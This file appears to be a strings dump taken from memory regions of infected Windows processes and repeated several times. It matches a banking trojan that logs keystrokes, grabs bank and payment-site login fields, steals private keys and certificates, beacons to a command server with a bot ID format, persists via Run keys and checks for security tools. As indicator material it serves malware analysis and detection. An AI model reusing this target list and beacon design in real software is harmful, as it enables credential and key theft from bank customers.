Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

LOCALSERVICE!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Dwm.exe_1376_rwx_007A0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Dwm.exe_1376_rwx_00800000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

ADM!WINUK0FFOO83I6!427963A6

MSCTF.Shared.MAPPING.fffffffe

MSCTF.Shared.MAPPING.ffffffff

MSCTF.Shared.MAPPING.fffffffd

MSCTF.Shared.MUTEX.fffffffe

MSCTF.Shared.MUTEX.ffffffff

C:\Windows\apppatch\xodaql.exe

C:\Users\"%CurrentUserName%"\AppData\Roaming\

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Explorer.EXE_1440_rwx_03FE0000_00056000:

.text

`.data

.reloc

`.rdata

@.data

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

\\.\NPF_NdisWanIp

Software\Microsoft\Windows NT\CurrentVersion

%s!%s!X

software\microsoft\windows nt\currentversion\winlogon

software\microsoft\windows\currentversion\run

\svchost.exe

iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|

\winlogon.exe

links.log

\History.IE5\index.dat

\Opera\Opera\typed_history.xml

avast.com

93.191.13.100

drweb

eset.com

z-oleg.com

kltest.org.ru

.comodo.com

google.com

Dnsapi.dll

ws2_32.dll

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)

/key.bin

data.txt

ntdll.dll

Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}

Global\HighMemoryEvent_x

explorer.exe

1.2.5

Winmm.dll

Kernel32.dll

Gdi32.dll

hXXp://

hXXps://

HTTP/1.

nspr4.dll

PR_OpenTCPSocket

[[[URL: %s

Process: %s

User-agent: %s]]]

{{{%s

Crypt32.dll

CertVerifyCertificateChainPolicy

Wininet.dll

HttpSendRequestA

HttpSendRequestW

HttpSendRequestExA

HttpSendRequestExW

set_url

microsoft.public.win32.programmer.kernel

\iexplore.exe

keygrab

u.bmp

\\.\PhysicalDrive%u

/topic.php

keylog.txt

passwords.txt

%s%u.zip

Content-Disposition: form-data; name="file"; filename="report"

HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Referer: hXXp://VVV.google.com

Content-Type: multipart/form-data; boundary=---------------------------%s

VVV.bing.com

VVV.microsoft.com

frd.exe

/faq.php

botid=%s&ver=1.0.2&up=%u&os=u&rights=%s<ime=%s%d&token=%d&cn=test

\chrome.exe

\java.exe

\javaw.exe

\javaws.exe

\opera.exe

\firefox.exe

\maxthon.exe

\avant.exe

\mnp.exe

\safari.exe

\netscape.exe

\tbb-firefox.exe

\frd.exe

\isclient.exe

\ipc_full.exe

\intpro.exe

\cbsmain.dll

\clmain.exe

\core.exe

\rundll32.exe

\notepad.exe

%s.dbf

%s.DBF

j_password=

pass.log

command=auth_loginByPassword&back_command=&back_custom1=&

edClientLogin=

edUserLogin=

edPassword=

&LOGIN_AUTHORIZATION_CODE=

action=auth&np=&login=

login=

password=

pass_

&ctl00$MainMenu$Login1$UserName=

&ctl00$MainMenu$Login1$Password=

advapi32.dll

login

name=%s&port=%u

/home.php

path.txt

keys.zip

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}

%s\d.bmp

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}

keys

private.txt

public.txt

\*.key

\self.cer

self.cer

self.pub

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}

ctunnel.exe

ctunnel.zip

path_ctunnel.txt

header.key

keys99

\header.key

masks2.key

\masks2.key

masks.key

\masks.key

\name.key

primary2.key

\primary2.key

primary.key

\primary.key

keys99.zip

path99.txt

bsi.dll

&domain=letitbit.net&

cc.txt

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}

prv_key.pfx

keys\

sign.cer

Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}

sks2xyz.dll

vb_pfx_import

\*.bk

Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}

secret.key

pubkeys.key

Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}

path1.txt

inter.zip

interpro.ini

Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}

cbsmain.dll

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}

ebank.laiki.com

pass.txt

Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}

w.qiwi.ru

Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}

FilialRCon.dll

ISClient.cfg

Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}

rfk.zip

client.zip

path_client.txt

path_keys.txt

Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}

Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}

Agava_Client.exe

KeysDiskPath

Agava_Client.ini

Agava_keys

keys_path.txt

stf.zip

mespro.dll

AddPSEPrivateKeyEx

core.exe

data\id.dbf

\data\id.dbf

keys%i.zip

path%i.txt

Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}

smime3.dll

nss3.dll

softokn3.dll

nssutil3.dll

sqlite3.dll

plc4.dll

plds4.dll

mozcrt19.dll

webmoney

balance.htm

%s\%s

SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command

Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3

login.yota.ru

YotaConfirmForm[password]

pass2.txt

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}

Software\Microsoft\Windows NT\CurrentVersion\Winlogon

winmm.dll

LibVNCServer 0.9.7

%s (%s)

d/d/d d:d

password check failed!

CertOpenSystemStoreA

CertDeleteCertificateFromStore

CertOpenStore

CertAddCertificateContextToStore

CertCloseStore

CertGetNameStringA

CertGetCertificateContextProperty

PFXImportCertStore

CertEnumCertificatesInStore

CertDuplicateCertificateContext

CertVerifyTimeValidity

PFXExportCertStoreEx

CRYPT32.dll

WinSCard.dll

SensApi.dll

GetTcpTable

IPHLPAPI.DLL

MSVCRT.dll

PSAPI.DLL

DNSAPI.dll

HttpQueryInfoA

HttpAddRequestHeadersW

HttpAddRequestHeadersA

HttpOpenRequestA

WININET.dll

WS2_32.dll

ShellExecuteA

SHFileOperationA

SHELL32.dll

SHLWAPI.dll

GetSystemWindowsDirectoryA

GetProcessHeap

WinExec

KERNEL32.dll

MapVirtualKeyW

SetKeyboardState

EnumChildWindows

GetKeyboardState

MsgWaitForMultipleObjects

USER32.dll

SetViewportOrgEx

GetViewportOrgEx

GDI32.dll

RegOpenKeyExA

RegCloseKey

RegFlushKey

RegEnumKeyExA

RegNotifyChangeKeyValue

CryptGetKeyParam

CryptDestroyKey

RegOpenKeyA

CryptGetUserKey

RegDeleteKeyA

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

;3 #>6.&

'2, / 0&7!4-)1#

Desk_%u%x

MSCTF.Shared.MAPPING.%x

.current

MSCTF.Shared.MUTEX.%x

.Prev

00c0

9!91969<9

?"?3?9?>?}?

11C1T1]1r1

4(4-484=4

= =$=(=,=0=4={=

mavast.com

ya.ru

serverkey.dat

\windows\

hXXps://light.wmtransfer.com/login.aspx?ReturnUrl=/default.aspx

btnLogin

Explorer.EXE_1440_rwx_04100000_00065000:

.text

`.rdata

@.data

.reloc

<>http

name.key

\secrets.key

sign.key

kernel32.dll

\explorer.exe

user32.dll

multi_pot.exe

HookExplorer.exe

proc_analyzer.exe

sckTool.exe

sniff_hit.exe

sysAnalyzer.exe

idag.exe

dumpcap.exe

wireshark.exe

SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

C:\iDEFENSE

